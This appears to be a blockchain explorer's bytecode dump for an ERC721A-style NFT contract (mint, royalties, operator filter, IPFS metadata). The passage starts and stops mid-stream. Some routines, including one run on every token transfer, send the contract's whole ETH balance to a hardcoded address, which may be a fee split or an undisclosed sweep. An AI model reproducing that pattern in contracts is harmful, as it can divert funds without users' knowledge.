26020600020905b815481529060010190602001808311610d9257829003601f168201915b5050505050905090565b60095481610dc561080b565b610dcf919061278b565b1115610dda57600080fd5b80600a54610de891906126e9565b341015610df457600080fd5b610dfe33826117ba565b50565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610efc576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610e7992919061264f565b602060405180830381865afa158015610e96573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610eba919061268d565b610efb57806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610ef29190612177565b60405180910390fd5b5b610f0683836117d8565b505050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f6557600080fd5b60095481610f7161080b565b610f7b919061278b565b1115610f8657600080fd5b610f9082826117ba565b5050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156110d3573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361100757611002858585856118e3565b6110e0565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161105092919061264f565b602060405180830381865afa15801561106d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611091919061268d565b6110d257336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016110c99190612177565b60405180910390fd5b5b6110df858585856118e3565b5b5050505050565b60606110f282611956565b60405160200161110291906128df565b6040516020818303038152906040529050919050565b60095481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b60095460016111bf61080b565b6111c9919061278b565b11156111d457600080fd5b60016111df33610c49565b106111e957600080fd5b6111fa336111f56119a6565b6117ba565b565b60008161120761139f565b11158015611216575060005482105b8015611254575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061126682610c31565b90508073ffffffffffffffffffffffffffffffffffffffff166112876119db565b73ffffffffffffffffffffffffffffffffffffffff16146112ea576112b3816112ae6119db565b61111e565b6112e9576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b6113ac6119e3565b60006113b7826116ee565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161461141e576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061142a84611a4f565b91509150611440818761143b6119db565b611a76565b61148c57611455866114506119db565b61111e565b61148b576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16036114f2576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6114ff8686866001611aba565b801561150a57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154600101919050819055506115d8856115b4888887611ac0565b7c020000000000000000000000000000000000000000000000000000000017611ae8565b600460008681526020019081526020016000208190555060007c020000000000000000000000000000000000000000000000000000000084160361165e576000600185019050600060046000838152602001908152602001600020540361165c57600054811461165b578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46116c68686866001611b13565b505050505050565b6116e983838360405180602001604052806000815250610f94565b505050565b600080829050806116fd61139f565b11611783576000548110156117825760006004600083815260200190815260200160002054905060007c0100000000000000000000000000000000000000000000000000000000821603611780575b6000810361177657600460008360019003935083815260200190815260200160002054905061174c565b80925050506117b5565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b6117d4828260405180602001604052806000815250611b91565b5050565b80600760006117e56119db565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff166118926119db565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31836040516118d79190612006565b60405180910390a35050565b6118ee848484610822565b60008373ffffffffffffffffffffffffffffffffffffffff163b146119505761191984848484611c2e565b61194f576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060a060405101806040526020810391506000825281835b60011561199157600184039350600a81066030018453600a810490508061196f575b50828103602084039350808452505050919050565b600060016103e86119b561080b565b6009546119c2919061290c565b6119cc919061275a565b6119d6919061278b565b905090565b600033905090565b6000471115611a4c5773727e046d8e5a3598e880723b69afe921a4671f5573ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611a46573d6000803e3d6000fd5b50611a4d565b5b565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611ad7868684611d7e565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b6103e76001611b2061080b565b611b2a919061278b565b10611b8b5773727e046d8e5a3598e880723b69afe921a4671f5573ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611b89573d6000803e3d6000fd5b505b50505050565b611b9b8383611d87565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611c2957600080549050600083820390505b611bdb6000868380600101945086611c2e565b611c11576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611bc8578160005414611c2657600080fd5b50505b505050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611c546119db565b8786866040518563ffffffff1660e01b8152600401611c769493929190612995565b6020604051808303816000875af1925050508015611cb257506040513d601f19601f82011682018060405250810190611caf91906129f6565b60015b611d2b573d8060008114611ce2576040519150601f19603f3d011682016040523d82523d6000602084013e611ce7565b606091505b506000815103611d23576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b60009392505050565b60008054905060008203611dc7576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b611dd46000848385611aba565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550611e4b83611e3c6000866000611ac0565b611e4585611f42565b17611ae8565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b818114611eec57808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600181019050611eb1565b5060008203611f27576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b806000819055505050611f3d6000848385611b13565b505050565b60006001821460e11b9050919050565b6000604051905090565b600080fd5b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b611f9b81611f66565b8114611fa657600080fd5b50565b600081359050611fb881611f92565b92915050565b600060208284031215611fd457611fd3611f5c565b5b6000611fe284828501611fa9565b91505092915050565b60008115159050919050565b61200081611feb565b82525050565b600060208201905061201b6000830184611ff7565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561205b578082015181840152602081019050612040565b60008484015250505050565b6000601f19601f8301169050919050565b600061208382612021565b61208d818561202c565b935061209d81856020860161203d565b6120a681612067565b840191505092915050565b600060208201905081810360008301526120cb8184612078565b905092915050565b6000819050919050565b6120e6816120d3565b81146120f157600080fd5b50565b600081359050612103816120dd565b92915050565b60006020828403121561211f5761211e611f5c565b5b600061212d848285016120f4565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061216182612136565b9050919050565b61217181612156565b82525050565b600060208201905061218c6000830184612168565b92915050565b61219b81612156565b81146121a657600080fd5b50565b6000813590506121b881612192565b92915050565b600080604083850312156121d5576121d4611f5c565b5b60006121e3858286016121a9565b92505060206121f4858286016120f4565b9150509250929050565b612207816120d3565b82525050565b600060208201905061222260008301846121fe565b92915050565b60008060006060848603121561224157612240611f5c565b5b600061224f868287016121a9565b9350506020612260868287016121a9565b9250506040612271868287016120f4565b9150509250925092565b6000806040838503121561229257612291611f5c565b5b60006122a0858286016120f4565b92505060206122b1858286016120f4565b9150509250929050565b60006040820190506122d06000830185612168565b6122dd60208301846121fe565b9392505050565b600080604083850312156122fb576122fa611f5c565b5b6000612309858286016121a9565b925050602061231a858286016121a9565b9150509250929050565b6000819050919050565b600061234961234461233f84612136565b612324565b612136565b9050919050565b600061235b8261232e565b9050919050565b600061236d82612350565b9050919050565b61237d81612362565b82525050565b60006020820190506123986000830184612374565b92915050565b6000602082840312156123b4576123b3611f5c565b5b60006123c2848285016121a9565b91505092915050565b6123d481611feb565b81146123df57600080fd5b50565b6000813590506123f1816123cb565b92915050565b6000806040838503121561240e5761240d611f5c565b5b600061241c858286016121a9565b925050602061242d858286016123e2565b9150509250929050565b600080fd5b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61247982612067565b810181811067ffffffffffffffff8211171561249857612497612441565b5b80604052505050565b60006124ab611f52565b90506124b78282612470565b919050565b600067ffffffffffffffff8211156124d7576124d6612441565b5b6124e082612067565b9050602081019050919050565b82818337600083830152505050565b600061250f61250a846124bc565b6124a1565b90508281526020810184848401111561252b5761252a61243c565b5b6125368482856124ed565b509392505050565b600082601f83011261255357612552612437565b5b81356125638482602086016124fc565b91505092915050565b6000806000806080858703121561258657612585611f5c565b5b6000612594878288016121a9565b94505060206125a5878288016121a9565b93505060406125b6878288016120f4565b925050606085013567ffffffffffffffff8111156125d7576125d6611f61565b5b6125e38782880161253e565b91505092959194509250565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061263657607f821691505b602082108103612649576126486125ef565b5b50919050565b60006040820190506126646000830185612168565b6126716020830184612168565b9392505050565b600081519050612687816123cb565b92915050565b6000602082840312156126a3576126a2611f5c565b5b60006126b184828501612678565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006126f4826120d3565b91506126ff836120d3565b925082820261270d816120d3565b91508282048414831517612724576127236126ba565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000612765826120d3565b9150612770836120d3565b9250826127805761277f61272b565b5b828204905092915050565b6000612796826120d3565b91506127a1836120d3565b92508282019050808211156127b9576127b86126ba565b5b92915050565b600081905092915050565b7f697066733a2f2f62616679626569626b69343432687a6f737669726436736b6e60008201527f6968676766377a787735326c6379686462666d783636626e736266646570697860208201527f61612f0000000000000000000000000000000000000000000000000000000000604082015250565b600061284c6043836127bf565b9150612857826127ca565b604382019050919050565b600061286d82612021565b61287781856127bf565b935061288781856020860161203d565b80840191505092915050565b7f2e6a736f6e000000000000000000000000000000000000000000000000000000600082015250565b60006128c96005836127bf565b91506128d482612893565b600582019050919050565b60006128ea8261283f565b91506128f68284612862565b9150612901826128bc565b915081905092915050565b6000612917826120d3565b9150612922836120d3565b925082820390508181111561293a576129396126ba565b5b92915050565b600081519050919050565b600082825260208201905092915050565b600061296782612940565b612971818561294b565b935061298181856020860161203d565b61298a81612067565b840191505092915050565b60006080820190506129aa6000830187612168565b6129b76020830186612168565b6129c460408301856121fe565b81810360608301526129d6818461295c565b905095945050505050565b6000815190506129f081611f92565b92915050565b600060208284031215612a0c57612a0b611f5c565b5b6000612a1a848285016129e1565b9150509291505056fea2646970667358221220cd7d73abea0df01ed6bf71b3a9ed9314e3a82e98de57633942ed5f2e0189c17564736f6c63430008110033

Deployed Bytecode

0x60806040526004361061014b5760003560e01c80636817c76c116100b6578063add5a4fa1161006f578063add5a4fa1461045d578063b88d4fde14610486578063c87b56dd146104a2578063d5abeb01146104df578063e985e9c51461050a578063f9cb63ac146105475761014b565b80636817c76c1461035a57806370a08231146103855780638da5cb5b146103c257806395d89b41146103ed578063a0712d6814610418578063a22cb465146104345761014b565b80632a55205a116101085780632a55205a146102585780633a233f89146102965780633ccfd60b146102bf57806341f43434146102d657806342842e0e146103015780636352211e1461031d5761014b565b806301ffc9a71461015057806306fdde031461018d578063081812fc146101b8578063095ea7b3146101f557806318160ddd1461021157806323b872dd1461023c575b600080fd5b34801561015c57600080fd5b5061017760048036038101906101729190611fbe565b61055e565b6040516101849190612006565b60405180910390f35b34801561019957600080fd5b506101a26105f0565b6040516101af91906120b1565b60405180910390f35b3480156101c457600080fd5b506101df60048036038101906101da9190612109565b610682565b6040516101ec9190612177565b60405180910390f35b61020f600480360381019061020a91906121be565b610701565b005b34801561021d57600080fd5b5061022661080b565b604051610233919061220d565b60405180910390f35b61025660048036038101906102519190612228565b610822565b005b34801561026457600080fd5b5061027f600480360381019061027a919061227b565b610972565b60405161028d9291906122bb565b60405180910390f35b3480156102a257600080fd5b506102bd60048036038101906102b891906122e4565b6109c3565b005b3480156102cb57600080fd5b506102d4610a2c565b005b3480156102e257600080fd5b506102eb610acf565b6040516102f89190612383565b60405180910390f35b61031b60048036038101906103169190612228565b610ae1565b005b34801561032957600080fd5b50610344600480360381019061033f9190612109565b610c31565b6040516103519190612177565b60405180910390f35b34801561036657600080fd5b5061036f610c43565b60405161037c919061220d565b60405180910390f35b34801561039157600080fd5b506103ac60048036038101906103a7919061239e565b610c49565b6040516103b9919061220d565b60405180910390f35b3480156103ce57600080fd5b506103d7610d01565b6040516103e49190612177565b60405180910390f35b3480156103f957600080fd5b50610402610d27565b60405161040f91906120b1565b60405180910390f35b610432600480360381019061042d9190612109565b610db9565b005b34801561044057600080fd5b5061045b600480360381019061045691906123f7565b610e01565b005b34801561046957600080fd5b50610484600480360381019061047f91906121be565b610f0b565b005b6104a0600480360381019061049b919061256c565b610f94565b005b3480156104ae57600080fd5b506104c960048036038101906104c49190612109565b6110e7565b6040516104d691906120b1565b60405180910390f35b3480156104eb57600080fd5b506104f4611118565b604051610501919061220d565b60405180910390f35b34801561051657600080fd5b50610531600480360381019061052c91906122e4565b61111e565b60405161053e9190612006565b60405180910390f35b34801561055357600080fd5b5061055c6111b2565b005b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806105b957506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806105e95750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b6060600280546105ff9061261e565b80601f016020809104026020016040519081016040528092919081815260200182805461062b9061261e565b80156106785780601f1061064d57610100808354040283529160200191610678565b820191906000526020600020905b81548152906001019060200180831161065b57829003601f168201915b5050505050905090565b600061068d826111fc565b6106c3576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156107fc576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161077992919061264f565b602060405180830381865afa158015610796573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107ba919061268d565b6107fb57806040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016107f29190612177565b60405180910390fd5b5b610806838361125b565b505050565b600061081561139f565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610960573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108945761088f8484846113a4565b61096c565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016108dd92919061264f565b602060405180830381865afa1580156108fa573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061091e919061268d565b61095f57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016109569190612177565b60405180910390fd5b5b61096b8484846113a4565b5b50505050565b60008060006103e860328561098791906126e9565b610991919061275a565b9050600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168192509250509250929050565b6000471115610a285773727e046d8e5a3598e880723b69afe921a4671f5573ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610a26573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a8657600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610acc573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610c1f573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b5357610b4e8484846116ce565b610c2b565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610b9c92919061264f565b602060405180830381865afa158015610bb9573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610bdd919061268d565b610c1e57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610c159190612177565b60405180910390fd5b5b610c2a8484846116ce565b5b50505050565b6000610c3c826116ee565b9050919050565b600a5481565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cb0576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610d369061261e565b80601f0160208091040260200160405190810160405280929190818152602001828054610d629061261e565b8015610daf5780601f10610d8457610100808354040283529160200191610daf565b820191906000526020600020905b815481529060010190602001808311610d9257829003601f168201915b5050505050905090565b60095481610dc561080b565b610dcf919061278b565b1115610dda57600080fd5b80600a54610de891906126e9565b341015610df457600080fd5b610dfe33826117ba565b50565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610efc576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610e7992919061264f565b602060405180830381865afa158015610e96573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610eba919061268d565b610efb57806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610ef29190612177565b60405180910390fd5b5b610f0683836117d8565b505050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f6557600080fd5b60095481610f7161080b565b610f7b919061278b565b1115610f8657600080fd5b610f9082826117ba565b5050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156110d3573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361100757611002858585856118e3565b6110e0565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161105092919061264f565b602060405180830381865afa15801561106d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611091919061268d565b6110d257336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016110c99190612177565b60405180910390fd5b5b6110df858585856118e3565b5b5050505050565b60606110f282611956565b60405160200161110291906128df565b6040516020818303038152906040529050919050565b60095481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b60095460016111bf61080b565b6111c9919061278b565b11156111d457600080fd5b60016111df33610c49565b106111e957600080fd5b6111fa336111f56119a6565b6117ba565b565b60008161120761139f565b11158015611216575060005482105b8015611254575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061126682610c31565b90508073ffffffffffffffffffffffffffffffffffffffff166112876119db565b73ffffffffffffffffffffffffffffffffffffffff16146112ea576112b3816112ae6119db565b61111e565b6112e9576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b6113ac6119e3565b60006113b7826116ee565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161461141e576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061142a84611a4f565b91509150611440818761143b6119db565b611a76565b61148c57611455866114506119db565b61111e565b61148b576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16036114f2576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6114ff8686866001611aba565b801561150a57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154600101919050819055506115d8856115b4888887611ac0565b7c020000000000000000000000000000000000000000000000000000000017611ae8565b600460008681526020019081526020016000208190555060007c020000000000000000000000000000000000000000000000000000000084160361165e576000600185019050600060046000838152602001908152602001600020540361165c57600054811461165b578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46116c68686866001611b13565b505050505050565b6116e983838360405180602001604052806000815250610f94565b505050565b600080829050806116fd61139f565b11611783576000548110156117825760006004600083815260200190815260200160002054905060007c0100000000000000000000000000000000000000000000000000000000821603611780575b6000810361177657600460008360019003935083815260200190815260200160002054905061174c565b80925050506117b5565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b6117d4828260405180602001604052806000815250611b91565b5050565b80600760006117e56119db565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff166118926119db565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31836040516118d79190612006565b60405180910390a35050565b6118ee848484610822565b60008373ffffffffffffffffffffffffffffffffffffffff163b146119505761191984848484611c2e565b61194f576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060a060405101806040526020810391506000825281835b60011561199157600184039350600a81066030018453600a810490508061196f575b50828103602084039350808452505050919050565b600060016103e86119b561080b565b6009546119c2919061290c565b6119cc919061275a565b6119d6919061278b565b905090565b600033905090565b6000471115611a4c5773727e046d8e5a3598e880723b69afe921a4671f5573ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611a46573d6000803e3d6000fd5b50611a4d565b5b565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611ad7868684611d7e565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b6103e76001611b2061080b565b611b2a919061278b565b10611b8b5773727e046d8e5a3598e880723b69afe921a4671f5573ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611b89573d6000803e3d6000fd5b505b50505050565b611b9b8383611d87565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611c2957600080549050600083820390505b611bdb6000868380600101945086611c2e565b611c11576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611bc8578160005414611c2657600080fd5b50505b505050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611c546119db565b8786866040518563ffffffff1660e01b8152600401611c769493929190612995565b6020604051808303816000875af1925050508015611cb257506040513d601f19601f82011682018060405250810190611caf91906129f6565b60015b611d2b573d8060008114611ce2576040519150601f19603f3d011682016040523d82523d6000602084013e611ce7565b606091505b506000815103611d23576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b60009392505050565b60008054905060008203611dc7576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b611dd46000848385611aba565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550611e4b83611e3c6000866000611ac0565b611e4585611f42565b17611ae8565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b818114611eec57808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600181019050611eb1565b5060008203611f27576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b806000819055505050611f3d6000848385611b13565b505050565b60006001821460e11b9050919050565b6000604051905090565b600080fd5b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b611f9b81611f66565b8114611fa657600080fd5b50565b600081359050611fb881611f92565b92915050565b600060208284031215611fd457611fd3611f5c565b5b6000611fe284828501611fa9565b91505092915050565b60008115159050919050565b61200081611feb565b82525050565b600060208201905061201b6000830184611ff7565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561205b578082015181840152602081019050612040565b60008484015250505050565b6000601f19601f8301169050919050565b600061208382612021565b61208d818561202c565b935061209d81856020860161203d565b6120a681612067565b840191505092915050565b600060208201905081810360008301526120cb8184612078565b905092915050565b6000819050919050565b6120e6816120d3565b81146120f157600080fd5b50565b600081359050612103816120dd565b92915050565b60006020828403121561211f5761211e611f5c565b5b600061212d848285016120f4565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061216182612136565b9050919050565b61217181612156565b82525050565b600060208201905061218c6000830184612168565b92915050565b61219b81612156565b81146121a657600080fd5b50565b6000813590506121b881612192565b92915050565b600080604083850312156121d5576121d4611f5c565b5b60006121e3858286016121a9565b92505060206121f4858286016120f4565b9150509250929050565b612207816120d3565b82525050565b600060208201905061222260008301846121fe565b92915050565b60008060006060848603121561224157612240611f5c565b5b600061224f868287016121a9565b9350506020612260868287016121a9565b9250506040612271868287016120f4565b9150509250925092565b6000806040838503121561229257612291611f5c565b5b60006122a0858286016120f4565b92505060206122b1858286016120f4565b9150509250929050565b60006040820190506122d06000830185612168565b6122dd60208301846121fe565b9392505050565b600080604083850312156122fb576122fa611f5c565b5b6000612309858286016121a9565b925050602061231a858286016121a9565b9150509250929050565b6000819050919050565b600061234961234461233f84612136565b612324565b612136565b9050919050565b600061235b8261232e565b9050919050565b600061236d82612350565b9050919050565b61237d81612362565b82525050565b60006020820190506123986000830184612374565b92915050565b6000602082840312156123b4576123b3611f5c565b5b60006123c2848285016121a9565b91505092915050565b6123d481611feb565b81146123df57600080fd5b50565b6000813590506123f1816123cb565b92915050565b6000806040838503121561240e5761240d611f5c565b5b600061241c858286016121a9565b925050602061242d858286016123e2565b9150509250929050565b600080fd5b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61247982612067565b810181811067ffffffffffffffff82111715612498576124976